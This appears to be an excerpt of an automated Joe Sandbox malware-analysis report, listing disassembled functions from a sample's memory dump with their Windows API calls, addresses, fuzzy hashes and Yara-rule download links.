Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 92a01788f03339505731aed9724c3648fa5bac5a8975aa915b0136fc960da9d6
Instruction ID: 1ca0f20498dbc0414ba6ff376a307cff3a313b4047991567ddc83c36e1307e91
Opcode Fuzzy Hash: 92a01788f03339505731aed9724c3648fa5bac5a8975aa915b0136fc960da9d6
Instruction Fuzzy Hash: 5FE01276501158AADB11A7949C49FDA77ACAF0D391F0440697645D2004D678DA848AF4

Function 007CA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007CA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 007CA3E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: acb602967e5699c6b9ac320f23be68a3f167083b7ed24ab50a0df758743de366
Instruction ID: 5d8f9160b6d54b7e4cb8ab3eaeb9388c21019c3ff3332de2b1288b4eab2f6cc4
Opcode Fuzzy Hash: acb602967e5699c6b9ac320f23be68a3f167083b7ed24ab50a0df758743de366
Instruction Fuzzy Hash: CFE0EDB1501258EBCB10DF55C545FADBBE8EB14365F10805EA84693201E378AE04DB91

Function 007D2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007D2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 007D2BB5

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 6809b8db8e6fffed87e51e84ca9125ef38100117f4e9cac6f50c4e44c8bd4c67
Instruction ID: 13f2184dfb0770f263830576202f428c5c1133ef9e462c7667e290256b763c78
Opcode Fuzzy Hash: 6809b8db8e6fffed87e51e84ca9125ef38100117f4e9cac6f50c4e44c8bd4c67
Instruction Fuzzy Hash: 26D0A7B4254200544D546A70290A4542775AFB17707A05687E420997C3FADC40439026

Function 007B12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 007B1306
ShowWindow.USER32(00000000), ref: 007B130D

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: fb5f4c2d0e87247da9297f7199ce4902e9881a1c754919d6050fc179f778d080
Instruction ID: fa10c6ccb5590eb075dc3b4b228a50174a1a348917f8da151455fc8c7ccadb65
Opcode Fuzzy Hash: fb5f4c2d0e87247da9297f7199ce4902e9881a1c754919d6050fc179f778d080
Instruction Fuzzy Hash: C5C012B245C200BECB020BB4EC09C6BBBACBFA5312F04C908B0A5C0060C238C210DB11

Function 007B1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B1A09

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f945d7bd8b870fb7f7b1dc2d82a9cfd06466cd20d241976b90a420dd7fa2ae61
Instruction ID: 859c38ad9642913ed31813b297b22513f0b65a11a763b7517b18187bc37514fb
Opcode Fuzzy Hash: f945d7bd8b870fb7f7b1dc2d82a9cfd06466cd20d241976b90a420dd7fa2ae61
Instruction Fuzzy Hash: 75C1B170A002549FEF15CF68C4A8BFA7BA5AF09310F9841B9EC45DF396DB389944CB61

Function 007B3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B3BBF

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a87084d73bd2a6c2362b8cbce290693ef02e559455050f12cff624b9e892919d
Instruction ID: d2488730e4e7146cc5757a86ba095b53f3023a4e59d88c03eb5a491c4a88aa07
Opcode Fuzzy Hash: a87084d73bd2a6c2362b8cbce290693ef02e559455050f12cff624b9e892919d
Instruction Fuzzy Hash: EB71A371500B44DEDB35DB74C859BE7B7E9AF14301F40492EE2AB87242EA3A7A84DF11

Function 007B8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B8289

Part of subcall function 007B13DC: __EH_prolog.LIBCMT ref: 007B13E1

Part of subcall function 007BA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007BA598

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: ba798e6b8a10b6ff9dc20c51874e70970ba335eca16a46bfcb597bf6ba2109bd
Instruction ID: 6bef0cb774bcb97a3a8c49ffa2ab666e78e709e52898712efbf7b244b36ba16d
Opcode Fuzzy Hash: ba798e6b8a10b6ff9dc20c51874e70970ba335eca16a46bfcb597bf6ba2109bd
Instruction Fuzzy Hash: 23419571944658DADB20EB60CC59BEEB7ACAF04304F4404FAE18A97083EB795EC9CB51

Function 007B13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B13E1

Part of subcall function 007B5E37: __EH_prolog.LIBCMT ref: 007B5E3C

Part of subcall function 007BCE40: __EH_prolog.LIBCMT ref: 007BCE45

Part of subcall function 007BB505: __EH_prolog.LIBCMT ref: 007BB50A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8a141ce0a39f2538810de3f19cb7d179f27995ade1b10f4243685f13f485c2bd
Instruction ID: 851fe349e075c5869e43ed0d6424856e6fa66efe63056bc2dae5c26583177a36
Opcode Fuzzy Hash: 8a141ce0a39f2538810de3f19cb7d179f27995ade1b10f4243685f13f485c2bd
Instruction Fuzzy Hash: 6B4149B0905B40DEE724CF398899AE6FBE5BF18300F90492ED5FE83282CB756654CB10

Function 007B13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B13E1

Part of subcall function 007B5E37: __EH_prolog.LIBCMT ref: 007B5E3C

Part of subcall function 007BCE40: __EH_prolog.LIBCMT ref: 007BCE45

Part of subcall function 007BB505: __EH_prolog.LIBCMT ref: 007BB50A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 68e11a0a0331b2aec190fc16d27730e6069d9b21388d5689d22da0d7333d2c17
Instruction ID: 5c999edb7939bd212176483c411c305700347a289f63e6420cb7262b17cc961e
Opcode Fuzzy Hash: 68e11a0a0331b2aec190fc16d27730e6069d9b21388d5689d22da0d7333d2c17
Instruction Fuzzy Hash: AD4148B0905B40DEE724DF798889AE6FBE5BF18300F90492ED5FE83282CB756654CB10

Function 007CB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007CB098

Part of subcall function 007B13DC: __EH_prolog.LIBCMT ref: 007B13E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a599a1c99821b10fe1f8f0a2d80ed18ca4a34ca9a48349b47dcdcf1506ec6ae1
Instruction ID: 6bd24adcd82dc4c115110be89374941eea56985dec0e133829f6fd23a11a1890
Opcode Fuzzy Hash: a599a1c99821b10fe1f8f0a2d80ed18ca4a34ca9a48349b47dcdcf1506ec6ae1
Instruction Fuzzy Hash: 33317E75C00249DFCF15DFA4C855AEEB7B4AF09304F5444AEE409B7242DB39AE04CB61

Function 007DAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,007E3A34), ref: 007DACF8

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 03c0792fe20e02f76e236da1676f9bea5ac7447838b1ee1578df9f7cc9728ba2
Instruction ID: 9a0f02d261778db30c42204531b9f8c45dc631b11ca8afcb925eb693a26170bc
Opcode Fuzzy Hash: 03c0792fe20e02f76e236da1676f9bea5ac7447838b1ee1578df9f7cc9728ba2
Instruction Fuzzy Hash: 2611CA33B11625BF9B259E28DC9095A73B6BB843707168522FD19AF358D738DC0187E2

Function 007BCE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007BCE45

Part of subcall function 007B5E37: __EH_prolog.LIBCMT ref: 007B5E3C

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7a7fe2b33b0954e2413f270705d0d5541829ca58bece8553d17dfc1bc0a52524
Instruction ID: f5d5064aed206b25cceef0cda6038146fcac600d38a56352c1bc053e680154ad
Opcode Fuzzy Hash: 7a7fe2b33b0954e2413f270705d0d5541829ca58bece8553d17dfc1bc0a52524
Instruction Fuzzy Hash: F01191B1A00344DEEB15EB798509BEEBBE89F44300F14446DE446A3682DB7C9E00C762

Function 007B9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B921A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f2c3dc12f5865469db570c4d9a37644257db3910870c19335929144b792559bf
Instruction ID: b6b9402a9f3e00c0c883b5167c0f904855da6059009933b16666f5a2e1ddab3b
Opcode Fuzzy Hash: f2c3dc12f5865469db570c4d9a37644257db3910870c19335929144b792559bf
Instruction Fuzzy Hash: 19018233D00528EBCF21ABA8CC95BDEB775BF88740F014125EA26B7252DA3CCD00C6A0

Function 007DC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 007DB136: RtlAllocateHeap.NTDLL(00000008,007E3A34,00000000,?,007D989A,00000001,00000364,?,?,?,007BD984,?,?,?,00000004,007BD710), ref: 007DB177

_free.LIBCMT ref: 007DC4E5

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 91314dd3965a6ba82eafe13662bd05173e9f4b7fce09ade41ac23393f4fde185
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 6D01DB72200346ABE7318F55984596AFBFDFB85370F25051EE594933C1EA34A905C764

Function 007DB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,007E3A34,00000000,?,007D989A,00000001,00000364,?,?,?,007BD984,?,?,?,00000004,007BD710), ref: 007DB177

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fe217c1d92c8eb0f046a2e82780794e703a46debbd1803f132b0a9d3dbf191a1
Instruction ID: c5229d63c08236c1dd86ba2736024cb9a1eb95991d9a9b0bafa1ef492c281c5b
Opcode Fuzzy Hash: fe217c1d92c8eb0f046a2e82780794e703a46debbd1803f132b0a9d3dbf191a1
Instruction Fuzzy Hash: BFF0B43650512DF7DB215A25AC19F9E3778BF41760B1A8113B8089B390DB2ADD0182E1

Function 007D3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 007D3C3F

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0fb024ba3e6218e73d79885b76175e570ee99305b865a298fef49c86fd5abf98
Instruction ID: f8a9c8cc5a96f3a855e4f7d800e0d3e87b0efdfd2cabec08a1694fa32fcbc94a
Opcode Fuzzy Hash: 0fb024ba3e6218e73d79885b76175e570ee99305b865a298fef49c86fd5abf98
Instruction Fuzzy Hash: 48F0A7322102169F9F114E68EC0499A77B9EF45B617104527FA09E72D0DB35EA20C7A1

Function 007D8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007DCA2C,00000000,?,007D6CBE,?,00000008,?,007D91E0,?,?,?), ref: 007D8E38

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2994152da185db431002db3dbddf916ef12bb263b2c1d568bc0ac02406123ae7
Instruction ID: 9b15159f3dcce877698cd23a8cc07c0dbb2267e9e1baff10f47fec5da7a795fa
Opcode Fuzzy Hash: 2994152da185db431002db3dbddf916ef12bb263b2c1d568bc0ac02406123ae7
Instruction Fuzzy Hash: 44E0E53120211596DAF126399C08F9B777CDF413A0F154253AC0897381CF2CCC008AF3

Function 007B5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B5AC2

Part of subcall function 007BB505: __EH_prolog.LIBCMT ref: 007BB50A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1c8234ecc83455fadbe08b53c33e0be1d325ab5c6beec43c196abe79622153f3
Instruction ID: 0cea9027d14a1d635d61c6373e7fa17af3e53f3fa355434461b538b4cf2304f6
Opcode Fuzzy Hash: 1c8234ecc83455fadbe08b53c33e0be1d325ab5c6beec43c196abe79622153f3
Instruction Fuzzy Hash: 69018C30811690DAD725EBB8C049BEDFBA49F64304F50848DE45663283CBB81B08D7E2

Function 007BA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 007BA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007BA592,000000FF,?,?), ref: 007BA6C4
Part of subcall function 007BA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007BA592,000000FF,?,?), ref: 007BA6F2
Part of subcall function 007BA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007BA592,000000FF,?,?), ref: 007BA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007BA598

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 66c69016c6a73fea843522409958b67ba13932c7b82e79e6077857da6073b9a6
Instruction ID: 6f37bb5840f3944a815ec42f2692024b24d73bb0ca564eb0952dfd95b3cd0e8c
Opcode Fuzzy Hash: 66c69016c6a73fea843522409958b67ba13932c7b82e79e6077857da6073b9a6
